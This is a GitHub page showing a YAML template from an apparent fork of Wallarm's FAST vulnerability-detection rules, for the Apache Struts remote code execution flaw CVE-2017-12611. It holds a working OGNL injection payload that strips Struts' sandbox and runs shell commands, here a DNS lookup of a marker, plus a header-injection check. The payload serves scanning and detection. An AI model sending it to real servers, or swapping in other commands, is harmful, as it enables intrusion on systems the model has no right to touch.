forked from wallarm/fast-detects
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2017-12611.yaml
31 lines (26 loc) · 1.24 KB
/
CVE-2017-12611.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
collect:
- uniq:
- [ URI ]
generate:
- into:
- GET
- payload:
- "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ping -n 1 DNS_MARKER'}:{'/bin/sh','-c','getent hosts DNS_MARKER'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"
- "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-WLRM-VLN-CHECK','STR_MARKER')}.multipart/form-data"
- method:
- replace
detect:
- oob:
- dns
- response:
- headers:
- "X-WLRM-VLN-CHECK": STR_MARKER
meta-info:
- type: rce
- threat: 90
- applicable_for: ["attack_rechecker"]
- tags:
- RCE
- Remote Code Execution
- CVE-2017-12611
- Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10